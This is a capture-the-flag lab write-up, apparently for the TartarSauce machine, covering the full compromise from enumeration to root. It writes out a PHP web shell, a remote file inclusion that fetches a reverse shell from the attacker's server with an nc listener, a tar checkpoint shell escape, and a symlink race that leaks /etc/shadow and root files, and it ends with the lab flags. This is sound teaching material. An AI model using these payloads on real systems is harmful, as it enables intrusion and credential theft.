Nmap Results

# Nmap 7.93 scan initiated Thu May 4 14:08:54 2023 as: nmap -Pn -p- --min-rate 1000 -A -oN scan.txt 10.10.10.88

Nmap scan report for 10.10.10.88

Host is up (0.012s latency).

Not shown: 65534 closed tcp ports (reset)

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

|_http-title: Landing Page

|_http-server-header: Apache/2.4.18 (Ubuntu)

| http-robots.txt: 5 disallowed entries

| /webservices/tar/tar/source/

| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/

|_/webservices/developmental/ /webservices/phpmyadmin/

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.93%E=4%D=5/4%OT=80%CT=1%CU=32296%PV=Y%DS=2%DC=T%G=Y%TM=6453F4D3

OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F8%GCD=1%ISR=110%TI=Z%CI=I%II=I%TS=A)OPS(O

OS:1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11N

OS:W7%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R

OS:=Y%DF=Y%T=40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%

OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y

OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R

OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=

OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S

OS:)

Network Distance: 2 hops

TRACEROUTE (using port 110/tcp)

HOP RTT ADDRESS

1 10.51 ms 10.10.14.1

2 10.62 ms 10.10.10.88

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Thu May 4 14:09:23 2023 -- 1 IP address (1 host up) scanned in 29.81 seconds

Service Enumeration

TCP/80



Looking at the robots.txt output from the nmap scan, there are some Disallow entries that we should most certainly explore further.

Exploring robots.txt

Disallow: /webservices/tar/tar/source/

Disallow: /webservices/monstra-3.0.4/

Disallow: /webservices/easy-file-uploader/

Disallow: /webservices/developmental/

Disallow: /webservices/phpmyadmin/

robots.txt

I use the Brave browser, so I'll use a one-liner to open each of the entries in a new browser tab.

curl -s http://10.10.10.88/robots.txt | grep Disallow | cut -d ' ' -f 2 | xargs -I {} brave-browser "http://10.10.10.88{}" &

Open all of the robots.txt entries in a new browser tab
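If you'd rather review the paths before opening them, or the robots.txt is served with CRLF line endings (which leaves a stray \r on each path, since cut passes it through untouched), the Disallow parsing can be pulled into a small function. This is a sketch: robots_disallow_urls is a hypothetical helper name, and it only prints URLs rather than launching a browser.

```shell
# Print one absolute URL per non-empty Disallow entry in robots.txt text read
# from stdin. $1 is the base URL, e.g. http://10.10.10.88 (hypothetical helper).
robots_disallow_urls() {
  local base="${1%/}"   # drop one trailing slash so we don't emit "//"
  # Strip CR characters, then match "Disallow:" at the start of a line,
  # case-insensitively, and trim whitespace around the path.
  tr -d '\r' | awk -v base="$base" '
    {
      if (tolower(substr($0, 1, 9)) == "disallow:") {
        path = substr($0, 10)
        gsub(/^[ \t]+|[ \t]+$/, "", path)
        if (path != "") print base path
      }
    }'
}
```

Usage: curl -s http://10.10.10.88/robots.txt | robots_disallow_urls http://10.10.10.88, then pipe the output to xargs as in the one-liner if you still want browser tabs.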

This is the only robots.txt entry for which the server returned a page. Everything else returned an HTTP 404.







Monstra CMS

Looking at the page, this seems to be a blogging platform called Monstra. There is a /admin login page per the Getting Started section, and the footer reads Powered by Monstra 3.0.4.



Monstra 3.0.4 appears to have several entries in Exploit Database; the most interesting ones being the file upload and remote code execution vulnerabilities. However, these exploits do require authentication.

We have neither a username nor password at this point. We could assume the username may be tartar or monstra, but I'm going to try looking around some more.





Finding a Valid Login

Test Usernames



I found that the Forgot Password page will disclose valid usernames.

I tested a few more possible usernames, and admin looks like the best bet for the next phase: password guessing.

Testing Passwords

Inspecting the Exploits

How easy for us... the login credentials are admin:admin. Let's take a look at those exploits.



searchsploit -m 43348

cat 43348.txt

Copy the .txt file to the current directory for inspection

Vulnerable Code:

https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php

line 19:

public static function main()

{

// Array of forbidden types

$forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht',

'php', 'phtml', 'php3', 'php4', 'php5',

'phps',

'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh',

'ksh', 'bsh', 'c', 'htaccess', 'htpasswd',

'exe', 'scr', 'dll', 'msi', 'vbs', 'bat',

'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty');

Per the write-up, this is the vulnerable code



The $forbidden_types array works on an explicit deny model, when it would be better to implicitly deny. In other words, this is a file extension blacklist, when the author should have whitelisted and denied anything not in the whitelist.
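To make the deny-list versus allow-list difference concrete, here is a small Bash sketch that runs the same file names through both approaches. The extension lists are illustrative (the deny list is a subset of Monstra's $forbidden_types, the allow list is made up), and the function names are hypothetical; this is not Monstra's actual upload code. Note how cmd.php7 slips past the deny list but is rejected by the allow list.

```shell
# Requires bash 4+ for the ${var,,} lowercase expansion.
deny_list=(html htm js php phtml php3 php4 php5 phps)   # subset of $forbidden_types
allow_list=(jpg jpeg png gif pdf txt)                   # hypothetical allow list

# Print the lowercase extension after the last dot.
ext_of() {
  local name="$1"
  local ext="${name##*.}"
  printf '%s\n' "${ext,,}"
}

# Deny-list check: accept anything that is not explicitly forbidden.
deny_list_accepts() {
  local ext bad
  ext="$(ext_of "$1")"
  for bad in "${deny_list[@]}"; do
    [[ "$ext" == "$bad" ]] && return 1
  done
  return 0
}

# Allow-list check: reject anything that is not explicitly permitted.
allow_list_accepts() {
  local ext good
  ext="$(ext_of "$1")"
  for good in "${allow_list[@]}"; do
    [[ "$ext" == "$good" ]] && return 0
  done
  return 1
}

for f in cmd.php cmd.php7 logo.png; do
  printf '%-9s deny-list:%-7s allow-list:%s\n' "$f" \
    "$(deny_list_accepts "$f" && echo accept || echo reject)" \
    "$(allow_list_accepts "$f" && echo accept || echo reject)"
done
```

The allow list fails closed: a new executable extension that nobody thought to add still gets rejected.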







We can upload a PHP web shell to the server using a .php7 extension, which is not in the blacklist, and gain command execution. The exploit author gives us an example web shell:

<?php $cmd=$_GET['cmd']; system($cmd); ?>

PHP web shell

Testing the Exploit

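echo '<?php $cmd=$_GET['"'"'cmd'"'"']; system($cmd); ?>' > cmd.php7

The '"'"' sequence closes the single-quoted string, adds a double-quoted single quote, and reopens the single-quoted string, which lets us nest a single quote inside single quotes. We're writing the web shell to cmd.php7.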
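If the '"'"' sequence feels fragile, a quoted heredoc writes the same file without any quote juggling: quoting the delimiter ('EOF') turns off parameter expansion, so $cmd and $_GET land in the file literally. This is an alternative suggestion, not the command used in the original test.

```shell
# Quoting the heredoc delimiter disables $-expansion inside the body,
# so the PHP is written exactly as typed, single quotes included.
cat > cmd.php7 <<'EOF'
<?php $cmd=$_GET['cmd']; system($cmd); ?>
EOF
```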

Exploit Failed...

I tried multiple file extensions and explored multiple avenues to get code execution on this service, but ran into several roadblocks. The server was throwing errors for even the most basic tasks like editing pages, adding snippets and plugins, and modifying settings. I began to suspect that I was sent down a rabbit hole.

More Enumeration

gobuster dir -u http://10.10.10.88/webservices -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -x php,txt,html -r -o gobuster.txt

Gobuster enumeration

/wp (Status: 200) [Size: 11237]

Interesting... WordPress?



It's not loading the content correctly; I suspect the site uses a hostname in its base URL.

I add this entry to my /etc/hosts file:

10.10.10.88 tartarsauce.htb

Resolve 'tartarsauce.htb' to 10.10.10.88
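To avoid piling up duplicate lines across boxes, the hosts entry can be added idempotently. This is a minimal sketch: add_hosts_entry and its optional third argument (the file to edit, defaulting to /etc/hosts) are hypothetical, and the grep check is a simple whole-word match rather than a full hosts-file parser.

```shell
# Append "IP hostname" to a hosts file unless the hostname already appears.
# Hypothetical helper; /etc/hosts is root-owned, so run it as root.
add_hosts_entry() {
  local ip="$1" host="$2" file="${3:-/etc/hosts}"
  # -F: fixed string (dots are literal); -w: whole-word match, so
  # "tartarsauce.htbx" would not count; -q: just set the exit status.
  if grep -qwF -- "$host" "$file" 2>/dev/null; then
    return 0
  fi
  printf '%s %s\n' "$ip" "$host" >> "$file"
}
```

Because /etc/hosts is root-owned, one way to call it is sudo bash -c "$(declare -f add_hosts_entry); add_hosts_entry 10.10.10.88 tartarsauce.htb".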



WordPress Enumeration

User Enumeration

I didn't see any usernames associated with the Hello World blog entry, so I'll try enumerating users with the WordPress REST API.



curl -s -X GET 'http://tartarsauce.htb/webservices/wp/index.php/wp-json/wp/v2/users' | jq

Call the '/wp/v2/users' API endpoint and pipe to 'jq' for formatting





It looks like there is one user, wpadmin. Let's see if we can find a valid login. I tried some selective guesses and discovered a brute-force prevention mechanism.

Fortunately, it does not appear to be an all-out blacklist. We can freely attempt to log in again despite this message.



You don't necessarily need WPScan to enumerate basic things about a WordPress instance. If you're just looking for something simple like themes, plugins, and users, nmap can do the job just fine.



find /usr/share/nmap/scripts -name '*wordpress*'

Find script files matching the name 'wordpress'



I try the http-wordpress-users script, though I doubt the results will differ from what the API returned.

sudo nmap -T4 -Pn -sC --script http-wordpress-users --script-args http-wordpress-users.basepath="/webservices/wp/",http-wordpress-users.limit="100" -p80 tartarsauce.htb

Craft a 'http-wordpress-users' scan using specific arguments

Plugin Enumeration



grep '@args' /usr/share/nmap/scripts/http-wordpress-enum.nse

Find any arguments the script takes

sudo nmap -T4 -Pn -sC --script http-wordpress-enum --script-args http-wordpress-enum.root="/webservices/wp/",http-wordpress-enum.search-limit="all",http-wordpress-enum.check-latest="true" -p80 tartarsauce.htb

Craft a 'http-wordpress-enum' scan using specific arguments

Looking over the plugins here, we can run searchsploit to see if there are any known public exploits for plugin versions. However, I don't see any exploits based on the versions here.



As with server banners, though, you shouldn't take things at face value. Every plugin should have a readme.txt file that you can check to see the current version.

http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/readme.txt

http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

http://tartarsauce.htb/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
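Checking those readme files by hand works, but the "Stable tag:" header line can also be pulled out with a short function. This sketch assumes the standard WordPress.org readme header format; readme_stable_tag is a hypothetical name, and since the tag is simply whatever text is in the file, it's still worth reading the changelog too.

```shell
# Print the value of the first "Stable tag:" header in readme.txt text on stdin.
# Hypothetical helper; assumes the WordPress.org "Key: value" header format.
readme_stable_tag() {
  tr -d '\r' | awk -F':' '
    tolower($1) ~ /^[ \t]*stable tag[ \t]*$/ {
      v = $2
      gsub(/^[ \t]+|[ \t]+$/, "", v)   # trim whitespace around the version
      print v
      exit
    }'
}
```

Usage: curl -s http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt | readme_stable_tag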

Looking at the change log for the gwolle-gb plugin, we can see that the file was modified to make it seem as though it's a higher version than it really is.



Exploit

We've found a WordPress plugin, gwolle-gb 1.5.3, that is vulnerable to remote file inclusion (RFI). The exploit targets a specific script and an injectable parameter. Let's take a look at the proof-of-concept.

searchsploit -m 38861

cat 38861.txt

Inspect the exploit documentation



http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

Proof-of-concept

The abspath parameter of the ajaxresponse.php script can be controlled by an attacker to include arbitrary PHP code from a remote URL. Let's test the POC out.



sudo python3 -m http.server 80

Start a web server using your preferred method



In testing, we see that ajaxresponse.php tries to load a wp-load.php file from the remote location. Let's see if we can get a reverse shell.

I'm going to use this as my reverse shell, changing any variables as necessary. Store the payload in a file named wp-load.php.

$ip = '10.10.14.2'; // CHANGE THIS

$port = 443; // CHANGE THIS

$shell = 'uname -a; w; id; /bin/bash -i';

Change these to your VPN IP and TCP port; I'm also going to use a Bash shell

sudo rlwrap nc -lnvp 443

Start a TCP listener

The stage is set:

- We've got wp-load.php configured with the correct details
- We've got the Python web server hosting wp-load.php
- We've got the TCP listener running

Now, let's execute.
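The trigger request is just the PoC URL filled in for this target. One detail worth getting right: the plugin appears to append wp-load.php to whatever abspath contains (consistent with the wp-load.php request seen on our web server), so abspath should end in a slash. The helper below is a hypothetical sketch that only builds the URL; the WordPress base path and attacker URL are the values used in this write-up.

```shell
# Build the gwolle-gb RFI trigger URL from the EDB 38861 PoC.
# Assumption: the plugin concatenates abspath with "wp-load.php", so the
# attacker URL needs a trailing slash to resolve to http://ATTACKER/wp-load.php.
gwolle_rfi_url() {
  local wp_base="${1%/}" attacker_url="$2"
  attacker_url="${attacker_url%/}/"   # make sure it ends with a slash
  printf '%s/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=%s\n' \
    "$wp_base" "$attacker_url"
}
```

With the listener and web server running: curl -s "$(gwolle_rfi_url http://tartarsauce.htb/webservices/wp http://10.10.14.2)"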

Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux

NAME="Ubuntu"

VERSION="16.04.4 LTS (Xenial Xerus)"

ID=ubuntu

ID_LIKE=debian

PRETTY_NAME="Ubuntu 16.04.4 LTS"

VERSION_ID="16.04"

HOME_URL="http://www.ubuntu.com/"

SUPPORT_URL="http://help.ubuntu.com/"

BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

VERSION_CODENAME=xenial

UBUNTU_CODENAME=xenial



Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Matching Defaults entries for www-data on TartarSauce:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:

(onuma) NOPASSWD: /bin/tar

Users and Groups

Local Users

onuma:x:1000:1000:,,,:/home/onuma:/bin/bash

Local Groups

cdrom:x:24:onuma

dip:x:30:onuma

plugdev:x:46:onuma

onuma:x:1000

Network Configurations

Network Interfaces

ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000

link/ether 00:50:56:b9:1d:db brd ff:ff:ff:ff:ff:ff

inet 10.10.10.88/24 brd 10.10.10.255 scope global ens192

valid_lft forever preferred_lft forever

Open Ports

tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -

Privilege Escalation



Lateral to Onuma

We can see in the sudo output that we can run tar as the user onuma. Therefore, we should be able to use the technique shown in GTFOBins to get a shell as this user.

sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/bash -i"
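The GTFOBins entry relies on two GNU tar options: --checkpoint=1 sets a checkpoint on every record, and --checkpoint-action=exec=COMMAND runs COMMAND through the shell at each checkpoint. The same primitive can be checked harmlessly on your own machine by having it record the current username instead of spawning a shell. This sketch assumes GNU tar, since --checkpoint-action is a GNU extension.

```shell
# Harmless local demo: the checkpoint action writes the running user's name
# to a temp file instead of launching /bin/bash.
marker="$(mktemp)"
tar -cf /dev/null /dev/null --checkpoint=1 \
  --checkpoint-action=exec="id -un > $marker" 2>/dev/null
cat "$marker"
```

Run via sudo -u onuma, the same action executes as onuma, which is why swapping the command for /bin/bash -i yields a shell as that user.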





Interesting Files

After obtaining a shell as onuma, I repeat the post-exploit enumeration process and hunt for anything interesting that might be available to this user.



I use that as a keyword and search the file system for wherever else that name might pop up.

grep -ilr backuperer / 2>/dev/null



/usr/sbin/backuperer looks interesting. The file command identifies it as a Bash script.

Evaluating the Backup Script

/usr/sbin/backuperer

#!/bin/bash

#-------------------------------------------------------------------------------------

# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ

# ONUMA Dev auto backup program

# This tool will keep our webapp backed up incase another skiddie defaces us again.

# We will be able to quickly restore from a backup in seconds ;P

#-------------------------------------------------------------------------------------

# Set Vars Here

basedir=/var/www/html

bkpdir=/var/backups

tmpdir=/var/tmp

testmsg=$bkpdir/onuma_backup_test.txt

errormsg=$bkpdir/onuma_backup_error.txt

tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)

check=$tmpdir/check

# formatting

printbdr()

{

for n in $(seq 72);

do /usr/bin/printf $"-";

done

}

bdr=$(printbdr)

# Added a test file to let us see when the last backup was run

/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.

/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.

/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.

/bin/sleep 30

# Test the backup integrity

integrity_chk()

{

/usr/bin/diff -r $basedir $check$basedir

}

/bin/mkdir $check

/bin/tar -zxvf $tmpfile -C $check

if [[ $(integrity_chk) ]]

then

# Report errors so the dev can investigate the issue.

/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg

integrity_chk >> $errormsg

exit 2

else

# Clean up and save archive to the bkpdir.

/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak

/bin/rm -rf $check .*

exit 0

fi

I'll review the most important parts of the script below...

# Backup onuma website dev files.

/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.

/bin/sleep 30

- Run /bin/tar as onuma and back up $basedir into a gzip-compressed tar file called $tmpfile
- $basedir and $tmpfile are defined in the variables at the top of the script
- $basedir is defined as /var/www/html
- $tmpfile is a randomized name, so /var/tmp/.{randomized_chars}
- tar runs in the background (&), and the script then pauses for 30 seconds
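It helps to know exactly what $tmpfile looks like when monitoring for it. The lines below reproduce the script's naming logic: a SHA-1 hash of 100 random bytes, which sha1sum prints as 40 hexadecimal characters, prefixed with a dot.

```shell
# Same pipeline as backuperer: hash 100 random bytes, keep only the hex digest
# (sha1sum prints "<hash>  -", and cut keeps the first space-separated field).
name=".$(head -c100 /dev/urandom | sha1sum | cut -d' ' -f1)"
echo "/var/tmp/$name"
# A dot plus 40 hex characters is a tighter filter than find's -name '.*'
# if other dotfiles happen to live in /var/tmp.
[[ "$name" =~ ^\.[0-9a-f]{40}$ ]] && echo "looks like a backuperer tmpfile"
```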

# Test the backup integrity

integrity_chk()

{

/usr/bin/diff -r $basedir $check$basedir

}

- Define a function called integrity_chk that recursively compares $basedir (/var/www/html) with $check$basedir (/var/tmp/check/var/www/html)

/bin/mkdir $check

/bin/tar -zxvf $tmpfile -C $check

if [[ $(integrity_chk) ]]

then

# Report errors so the dev can investigate the issue.

/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg

integrity_chk >> $errormsg

exit 2

else

# Clean up and save archive to the bkpdir.

/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak

/bin/rm -rf $check .*

exit 0

fi- Create the directory

$check:/var/tmp/check - Extract

$tmpfile:/var/tmp/.{randomized_chars}to$check:/var/tmp/check - Then,



if [[ $(integrity_chk) ]]says ifdiff -r $basedir $check$basedirreturns some output, then the files in$basedirand the files in$checkbasedirare not the same. The output from thediffcommand will be logged to$errormsg:/var/backups/onuma_backup_error.txt.

Abusing the Script

We can see the script runs at five-minute intervals by inspecting /var/backups/onuma_backup_test.txt and observing the last-run timestamp.

I'm almost certain this script is being run via the root user's crontab, as the cron job is not in onuma's crontab, nor is it in any readable /etc/cron file.

My plan to abuse the script is:

- Monitor for the creation of $tmpfile (/var/tmp/.{randomized_chars})
- Once this file is created, we have 30 seconds to create a condition where integrity_chk() will produce some output
- To do that, once $tmpfile is created, symbolically link /root/root.txt and /etc/shadow into /var/www/html as the www-data user

until [[ $(find /var/tmp/ -maxdepth 1 -type f -name '.*') ]] ; do sleep 3 ; done ; mv /var/www/html/index.html /tmp/index.html ; mv /var/www/html/robots.txt /tmp/robots.txt ; ln -s /etc/shadow /var/www/html/index.html ; ln -s /root/root.txt /var/www/html/robots.txt ; until [[ ! $(ps aux | grep backuperer | grep -v grep) ]] ; do sleep 3 ; done ; unlink /var/www/html/index.html ; unlink /var/www/html/robots.txt ; mv /tmp/index.html /var/www/html/index.html ; mv /tmp/robots.txt /var/www/html/robots.txt ; cat /var/backups/onuma_backup_error.txt

Bash one-liner to create the integrity_chk condition

Allow me to explain the Bash one-liner:

until [[ $(find /var/tmp/ -maxdepth 1 -type f -name '.*') ]] ; do sleep 3 ; done ;

- Until the find command finds a file whose name starts with . in /var/tmp, sleep for 3 seconds in a continuous loop
- Once that is done, the next series of commands will be run
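The polling loop can also be wrapped in a function that gives up after a timeout and only matches names shaped like backuperer's archive (a dot followed by 40 hex characters) rather than any dotfile. This is a hedged sketch, not part of the original one-liner; wait_for_tmpfile and its arguments (directory, timeout in seconds, poll interval) are hypothetical.

```shell
# Poll a directory until a file named like backuperer's archive appears,
# print its path and return 0; return 1 if the timeout (seconds) expires.
wait_for_tmpfile() {
  local dir="${1:-/var/tmp}" timeout="${2:-360}" interval="${3:-3}"
  local waited=0 f
  while (( waited < timeout )); do
    for f in "$dir"/.*; do
      # -f skips "." and ".." and the unexpanded glob when nothing matches.
      if [[ -f "$f" && "${f##*/}" =~ ^\.[0-9a-f]{40}$ ]]; then
        printf '%s\n' "$f"
        return 0
      fi
    done
    sleep "$interval"
    (( waited += interval ))
  done
  return 1
}
```

Usage: f="$(wait_for_tmpfile /var/tmp 360 3)" && echo "archive: $f"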

mv /var/www/html/index.html /tmp/index.html ;

mv /var/www/html/robots.txt /tmp/robots.txt ;

ln -s /etc/shadow /var/www/html/index.html ;

ln -s /root/root.txt /var/www/html/robots.txt ;- Backup the original

index.htmlandrobots.txtfiles to the/tmpdirectory - Create a symbolic link of

/etc/shadowto/var/www/html/index.html - Create a symbolic link of

/root/root.txtto/var/www/html/robots.txt - Then, once



integrity_chk()comapres/var/www/htmlto/var/tmp/check/var/www/html, theindex.htmland therobots.txtin/var/tmp/checkwill be different from those in/var/www/htmland the differential lines will be written to the error log
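Why does the error log end up containing the linked files' contents? The sketch below simulates integrity_chk locally with throwaway directories: the "archive" copy keeps the original file, the live file is swapped for a symlink, and diff -r follows that symlink (GNU diff dereferences symlinks by default) and prints the target's contents as the difference. On TartarSauce the same diff runs as root, which is what makes /etc/shadow and /root/root.txt readable. All paths here are temporary stand-ins.

```shell
# web/ stands in for /var/www/html, check/web/ for the extracted archive,
# and secret.txt for /etc/shadow or /root/root.txt.
lab="$(mktemp -d)"
mkdir -p "$lab/web" "$lab/check/web"
echo 'original page' > "$lab/web/index.html"
echo 'original page' > "$lab/check/web/index.html"   # what tar captured
echo 'TOP SECRET' > "$lab/secret.txt"

# After the archive is taken, replace the live file with a symlink.
rm "$lab/web/index.html"
ln -s "$lab/secret.txt" "$lab/web/index.html"

# diff follows the link and reports the secret as a changed line.
# It exits 1 when files differ, so || true keeps that from reading as an error.
diff -r "$lab/web" "$lab/check/web" || true
```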

until [[ ! $(ps aux | grep backuperer | grep -v grep) ]] ; do sleep 3 ; done ; unlink /var/www/html/index.html ; unlink /var/www/html/robots.txt ; mv /tmp/index.html /var/www/html/index.html ; mv /tmp/robots.txt /var/www/html/robots.txt ; cat /var/backups/onuma_backup_error.txt

- This last part is just a bit of cleanup. Until the /usr/sbin/backuperer process exits, repeatedly sleep for 3 seconds
- Then, clean up the symbolic links and restore the original files from /tmp
- Finally, output the contents of the error file

Flags

User

29396f139dae2b3450dc45dfd3bf7f11

Root

d616321b4ea63730b7a23287d8cb24bb